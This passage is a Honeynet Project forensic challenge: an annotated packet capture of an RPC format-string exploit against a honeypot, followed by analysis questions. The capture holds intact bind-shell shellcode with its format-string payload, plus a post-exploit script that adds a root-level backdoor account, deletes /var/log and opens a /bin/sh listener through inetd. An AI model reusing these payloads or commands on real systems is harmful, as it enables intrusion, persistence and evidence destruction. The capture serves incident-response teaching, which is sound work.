90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1. EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A... FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A. 99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A.. 66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?..... 3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin. 46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V 10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N............. FF FF FF 00 .... =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:14.517554 207.19.5.25:710 -> 172.16.1.104:931 UDP TTL:49 TOS:0x0 ID:49145 Len: 1084 0C 72 54 F5 00 00 00 00 00 00 00 02 00 01 86 B8 .rT............. 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 20 ............... 3A 32 3F ED 00 00 00 09 6C 6F 63 61 6C 68 6F 73 :2?.....localhos 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 t............... 00 00 00 00 00 00 00 00 00 00 03 E7 18 F7 FF BF ................ 18 F7 FF BF 19 F7 FF BF 19 F7 FF BF 1A F7 FF BF ................ 1A F7 FF BF 1B F7 FF BF 1B F7 FF BF 25 38 78 25 ............%8x% 38 78 25 38 78 25 38 78 25 38 78 25 38 78 25 38 8x%8x%8x%8x%8x%8 78 25 38 78 25 38 78 25 32 33 36 78 25 6E 25 31 x%8x%8x%236x%n%1 33 37 78 25 6E 25 31 30 78 25 6E 25 31 39 32 78 37x%n%10x%n%192x 25 6E 90 90 90 90 90 90 90 90 90 90 90 90 90 90 %n.............. 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 90 90 90 90 90 90 90 90 90 90 90 90 90 90 31 C0 ..............1. EB 7C 59 89 41 10 89 41 08 FE C0 89 41 04 89 C3 .|Y.A..A....A... FE C0 89 01 B0 66 CD 80 B3 02 89 59 0C C6 41 0E .....f.....Y..A. 99 C6 41 08 10 89 49 04 80 41 04 0C 88 01 B0 66 ..A...I..A.....f CD 80 B3 04 B0 66 CD 80 B3 05 30 C0 88 41 04 B0 .....f....0..A.. 66 CD 80 89 CE 88 C3 31 C9 B0 3F CD 80 FE C1 B0 f......1..?..... 3F CD 80 FE C1 B0 3F CD 80 C7 06 2F 62 69 6E C7 ?.....?..../bin. 46 04 2F 73 68 41 30 C0 88 46 07 89 76 0C 8D 56 F./shA0..F..v..V 10 8D 4E 0C 89 F3 B0 0B CD 80 B0 01 CD 80 E8 7F ..N............. FF FF FF 00 .... ### The exploit is done. A shell was bound to port 39168. He ### now connects to this port and executes several commands. =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:21.466595 207.19.5.25:2646 -> 172.16.1.104:39168 TCP TTL:49 TOS:0x0 ID:49963 DF **S***** Seq: 0x6B9CD069 Ack: 0x0 Win: 0x7D78 TCP Options => MSS: 1460 SackOK TS: 98106716 0 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:21.467540 207.19.5.25:2646 -> 172.16.1.104:39168 TCP TTL:241 TOS:0x0 ID:26191 ****R*** Seq: 0x0 Ack: 0x0 Win: 0x0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:21.468617 172.16.1.104:39168 -> 207.19.5.25:2646 TCP TTL:63 TOS:0x0 ID:48243 DF **S***A* Seq: 0x4D5819B5 Ack: 0x6B9CD06A Win: 0x7D78 TCP Options => MSS: 1460 SackOK TS: 107932029 98106716 NOP WS: 0 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:21.613942 207.19.5.25:2646 -> 172.16.1.104:39168 TCP TTL:49 TOS:0x0 ID:49978 DF ******A* Seq: 0x6B9CD06A Ack: 0x4D5819B6 Win: 0x7D78 TCP Options => NOP NOP TS: 98106736 107932029 ### Here we see the commands executed by bad guy. These commands ### appear to be scripted and NOT manually inputed. The script ### creates the two system accouts. ### Notice the script deletes /var/log and adds a /bin/sh listening ### on port 16000. ### QUESTION 6: What two accounts are created, and what are the UID's? =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:22.847098 207.19.5.25:2646 -> 172.16.1.104:39168 TCP TTL:49 TOS:0x0 ID:50108 DF *****PA* Seq: 0x6B9CD06A Ack: 0x4D5819B6 Win: 0x7D78 TCP Options => NOP NOP TS: 98106837 107932029 65 63 68 6F 20 75 73 65 72 3A 78 3A 35 30 30 30 echo user:x:5000 3A 35 30 30 30 3A 2F 75 73 65 72 3A 2F 74 6D 70 :5000:/user:/tmp 3A 2F 62 69 6E 2F 62 61 73 68 20 3E 3E 20 2F 65 :/bin/bash >> /e 74 63 2F 70 61 73 73 77 64 3B 20 65 63 68 6F 20 tc/passwd; echo 75 73 65 72 3A 59 69 32 79 43 47 48 6F 30 77 4F user:Yi2yCGHo0wO 77 67 3A 31 30 38 38 34 3A 30 3A 39 39 39 39 39 wg:10884:0:99999 3A 37 3A 2D 31 3A 2D 31 3A 31 33 34 35 33 38 34 :7:-1:-1:1345384 31 32 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 12 >> /etc/shado 77 3B 20 65 63 68 6F 20 73 65 6E 64 6D 61 69 6C w; echo sendmail 3A 3A 31 30 38 36 35 3A 30 3A 39 39 39 39 39 3A ::10865:0:99999: 37 3A 2D 31 3A 2D 31 3A 31 33 34 35 33 38 34 36 7:-1:-1:13453846 30 20 3E 3E 20 2F 65 74 63 2F 73 68 61 64 6F 77 0 >> /etc/shadow 3B 20 65 63 68 6F 20 73 65 6E 64 6D 61 69 6C 3A ; echo sendmail: 78 3A 30 3A 30 3A 3A 2F 72 6F 6F 74 3A 2F 62 69 x:0:0::/root:/bi 6E 2F 62 61 73 68 20 3E 3E 20 2F 65 74 63 2F 70 n/bash >> /etc/p 61 73 73 77 64 3B 20 70 77 63 6F 6E 76 3B 20 72 asswd; pwconv; r 6D 20 2D 72 66 20 2F 76 61 72 2F 6C 6F 67 3B 65 m -rf /var/log;e 63 68 6F 20 31 36 30 30 30 20 73 74 72 65 61 6D cho 16000 stream 20 74 63 70 20 6E 6F 77 61 69 74 20 72 6F 6F 74 tcp nowait root 20 2F 75 73 72 2F 73 62 69 6E 2F 74 63 70 64 20 /usr/sbin/tcpd 2F 62 69 6E 2F 73 68 20 3E 3E 20 2F 65 74 63 2F /bin/sh >> /etc/ 69 6E 65 74 64 2E 63 6F 6E 66 3B 72 6D 20 2D 72 inetd.conf;rm -r 66 20 2F 65 74 63 2F 68 6F 73 74 73 2E 64 65 6E f /etc/hosts.den 79 3B 6B 69 6C 6C 61 6C 6C 20 2D 48 55 50 20 69 y;killall -HUP i 6E 65 74 64 3B 00 02 40 68 38 01 40 C4 9C 04 08 netd;..@h8.@.... 84 9C 04 25 D6 9C 04 08 02 00 00 25 00 00 00 00 ...%.......%.... 08 00 00 00 44 9C 04 08 44 00 00 00 00 00 00 00 ....D...D....... 00 00 00 00 00 00 00 00 00 00 00 00 4C FC FF BF ............L... EE 9B 04 08 C0 00 00 25 44 05 00 40 01 00 00 00 .......%D..@.... 00 00 00 00 53 00 00 00 03 00 00 00 68 FD FF BF ....S.......h... 4F FC FF BF 48 9C 04 08 41 9C 04 08 07 00 00 00 O...H...A....... FF FF FF FF 79 0D 00 40 A3 84 02 40 68 38 01 40 ....y..@...@h8.@ E0 43 01 40 D3 64 00 00 0E 9B 02 40 6C F8 FF BF .C.@.d.....@l... E6 81 00 40 D5 9A 02 40 D5 9A 02 40 02 14 00 40 ...@...@...@...@ 80 F8 FF BF 02 14 00 40 88 F8 FF BF E6 81 00 40 .......@.......@ E1 13 00 40 D5 9A 02 40 68 38 01 40 0E 9B 02 40 ...@...@h8.@...@ A0 F8 FF BF E6 81 00 40 D5 9A 02 40 D5 9A 02 40 .......@...@...@ 68 38 01 40 E0 43 01 40 23 38 00 00 C9 0E 00 40 h8.@.C.@#8.....@ 00 00 00 00 A0 13 00 40 00 00 00 00 E0 43 01 40 .......@.....C.@ 00 00 00 00 00 00 00 00 03 00 00 00 30 35 00 00 ............05.. 01 00 00 00 00 00 64 20 00 00 00 00 00 00 00 00 ......d ........ A0 E2 01 40 53 03 00 00 D0 1F 02 40 70 AD 01 40 ...@S......@p..@ E0 43 01 40 03 00 00 00 50 46 01 40 01 00 00 00 .C.@....PF.@.... 58 F8 73 20 FF FF FF FF F3 FF FF FF 00 00 00 00 X.s ............ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 54 FF FF BF ............T... FF FF FF FF D0 FB 04 08 00 00 00 00 00 00 00 00 ................ 00 00 00 00 05 00 00 00 01 00 00 00 98 FD FF BF ................ 6F FD FF BF ED 9B 04 08 EB 9B 04 08 0E 00 00 00 o............... FF FF FF FF FD A7 00 40 D0 43 01 40 C0 46 01 40 .......@.C.@.F.@ 07 00 00 00 4E A7 00 40 EC 81 10 40 29 B9 0F 40 ....N..@...@)..@ C5 B8 0F 40 E0 43 01 40 A0 E2 01 40 FC 84 10 40 ...@.C.@...@...@ F3 57 02 40 A0 E2 01 40 50 F9 FF BF 70 A9 00 40 .W.@...@P...p..@ 14 00 00 00 04 F9 FF BF C0 81 07 40 E0 43 01 40 ...........@.C.@ EE 9B 04 08 EC 81 10 40 50 F9 FF BF 1B 3A 03 40 .......@P....:.@ 43 00 0F 40 00 00 00 00 00 00 00 00 47 45 53 2F C..@........GES/ 6C 69 62 63 2E 6D 6F 00 EC 81 10 40 05 00 00 00 libc.mo....@.... 74 FE FF BF E0 43 01 40 0F F9 FF BF B4 83 10 40 t....C.@.......@ B6 42 02 40 6F 00 01 40 05 00 00 00 00 F9 FF BF .B.@o..@........ 04 F9 FF BF D6 B8 0F 40 EF B8 0F 40 00 00 00 00 .......@...@.... 6C F9 FF BF 24 64 0E 40 C0 B8 0F 40 06 24 10 40 l...$d.@...@.$.@ 05 00 00 00 EC 81 10 40 DD FB 04 08 96 61 0E 40 .......@.....a.@ DD FB 04 08 06 24 10 40 EC 81 10 40 60 AE 00 40 .....$.@...@`..@ 74 FE FF BF D0 FB 04 08 05 00 00 00 00 00 00 00 t............... 00 00 00 00 E8 80 01 40 18 00 00 00 F4 17 00 40 .......@.......@ 04 00 00 00 E8 80 01 40 00 3C 01 40 0C FA FF BF .......@.<.@.... 08 FA FF BF 04 FA FF BF 00 3C 01 40 D4 80 01 40 .........<.@...@ 00 00 00 00 14 08 00 40 D4 38 01 40 02 14 00 40 .......@.8.@...@ F4 02 00 40 80 87 04 08 80 87 04 08 24 FA FF BF ...@........$... 02 00 00 00 D0 1F 02 40 00 3C 01 40 15 BA 00 40 .......@.<.@...@ 68 38 01 40 14 08 00 40 B0 41 00 40 01 00 00 00 h8.@...@.A.@.... 0C FA FF BF 28 15 00 40 C8 02 00 00 00 00 00 00 ....(..@........ 80 87 04 08 00 00 00 00 01 00 00 00 24 08 00 40 ............$..@ 2C FA FF BF BB 75 00 40 00 50 01 40 B2 2F 00 00 ,....u.@.P.@./.. 68 38 01 40 64 FB FF BF 0E 38 00 40 68 38 01 40 h8.@d....8.@h8.@ 0C 22 00 40 0E 9B 02 40 18 FB FF BF C1 0A 03 40 .".@...@.......@ EC 81 10 40 CC FB FF BF EC 81 10 40 EC 81 10 40 ...@.......@...@ FC FB FF BF 10 FD FF BF 68 38 01 40 C1 0A 03 40 ........h8.@...@ EC 81 10 40 EC FB FF BF EC 81 10 40 EC 81 10 40 ...@.......@...@ 1C FC FF BF 30 FD FF BF 08 FC FF BF 00 00 00 00 ....0........... 05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40 ............h..@ 00 00 00 00 00 00 00 00 28 FC FF BF 00 00 00 00 ........(....... 05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40 ............h..@ 00 00 00 00 00 00 00 00 0E 9B 02 40 9C FB FF BF ...........@.... E6 81 00 40 D5 9A 02 40 D5 9A 02 40 68 38 01 40 ...@...@...@h8.@ E0 43 01 40 05 68 00 00 90 E8 01 40 90 FB FF BF .C.@.h.....@.... 20 00 00 00 14 FB FF BF 1A D1 0E 40 A8 FB 04 08 ..........@.... 14 FA 04 08 20 00 00 00 20 61 00 00 00 00 00 00 .... ... a...... 90 FB FF BF 00 00 00 00 0A C7 0E 40 90 0E 02 40 ...........@...@ 12 06 00 00 D0 1F 02 40 70 AD 01 40 E0 43 01 40 .......@p..@.C.@ 03 00 00 00 50 46 01 40 ....PF.@ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:22.851135 172.16.1.104:39168 -> 207.19.5.25:2646 TCP TTL:63 TOS:0x0 ID:48244 DF ******A* Seq: 0x4D5819B6 Ack: 0x6B9CD612 Win: 0x7C70 TCP Options => NOP NOP TS: 107932167 98106837 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:22.851231 207.19.5.25:2646 -> 172.16.1.104:39168 TCP TTL:49 TOS:0x0 ID:50109 DF ***F*PA* Seq: 0x6B9CD612 Ack: 0x4D5819B6 Win: 0x7D78 TCP Options => NOP NOP TS: 98106837 107932029 01 00 00 00 54 FB FF BF 90 0E 02 40 E4 45 01 40 ....T......@.E.@ AE C7 1F 0D D0 FB FF BF EC 81 10 40 EC 81 10 40 ...........@...@ 90 01 05 08 90 01 05 08 90 01 00 00 EC 81 10 40 ...............@ 90 FB FF BF 80 64 00 00 A8 FB FF BF A8 FB FF BF .....d.......... 00 00 00 00 90 FB FF BF F0 11 02 40 D6 34 00 00 ...........@.4.. D0 1F 02 40 70 AD 01 40 E0 43 01 40 08 03 00 00 ...@p..@.C.@.... A9 46 00 00 A4 81 01 00 C1 0A 03 40 EC 81 10 40 .F.........@...@ CC FB FF BF EC 81 10 40 EC 81 10 40 FC FB FF BF .......@...@.... 10 FD FF BF CA 3F 32 3A 00 00 00 00 05 00 00 00 .....?2:........ ED 9B 0A 40 FC FB FF BF FC FB FF BF 02 00 00 00 ...@............ 90 FC FF BF 00 00 00 00 2C 79 0E 40 60 AE 00 40 ........,y.@`..@ 74 FE FF BF FF FF FF FF 20 68 10 40 00 70 01 40 t....... h.@.p.@ 90 FC FF BF 01 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 28 FC FF BF 00 00 00 00 ........(....... 05 00 00 00 00 00 00 00 00 00 00 00 68 AC 03 40 ............h..@ 00 00 00 00 00 00 00 00 0E 9B 02 40 9C FB FF BF ...........@.... E6 81 00 40 D5 9A 02 40 D5 9A 02 40 68 38 01 40 ...@...@...@h8.@ E0 43 01 40 05 68 00 00 90 E8 01 40 90 FB FF BF .C.@.h.....@.... 20 00 00 00 14 FB FF BF 1A D1 0E 40 A8 FB 04 08 ..........@.... 14 FA 04 08 20 00 00 00 20 61 00 00 00 00 00 00 .... ... a...... 90 FB FF BF 00 00 00 00 0A C7 0E 40 90 0E 02 40 ...........@...@ 00 00 00 00 68 AC 03 40 00 00 00 00 00 00 00 00 ....h..@........ A7 9B 04 08 00 00 00 00 00 00 00 00 A4 54 02 40 .............T.@ 3E 69 02 40 44 5F 02 40 30 85 04 08 84 34 AD FB >i.@D_.@0....4.. 30 85 04 08 26 03 00 00 20 02 02 40 4B 05 00 00 0...&... ..@K... D0 1F 02 40 70 AD 01 40 E0 43 01 40 03 00 00 00 ...@p..@.C.@.... EC 81 10 40 E4 E7 06 40 04 00 00 00 00 60 01 40 ...@...@.....`.@ 0E 00 00 00 EC 81 10 40 00 60 01 40 90 01 05 08 .......@.`.@.... 20 02 02 40 E0 43 01 40 24 FD FF BF C4 E8 06 40 ..@.C.@$......@ 90 01 05 08 0E 60 01 40 00 00 01 00 00 00 00 00 .....`.@........ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 ........ =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ 12/09-07:17:22.853395 172.16.1.104:39168 -> 207.19.5.25:2646 TCP TTL:63 TOS:0x0 ID:48245 DF ******A* Seq: 0x4D5819B6 Ack: 0x6B9CD86B Win: 0x7A17 TCP Options => NOP NOP TS: 107932168 98106837 =+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+ Attack completed. The unanswered questions are: ### QUESTION 1: Can you name the FTP scanning tool? ### QUESTION 2: What does this FTP exploit achieve? Does it open a port, create a shell, add a user account? ### QUESTION 3: Is the FTP attack successful? ### QUESTION 4: What RPC service is exploited? ### QUESTION 5: Where in the exploit code below does he bind a shell to port 39168? ### QUESTION 6: What two accounts are created, and what are the UID's? Do you have any further analysis you can add? ------- Honeynet Project, http://project.honeynet.org --------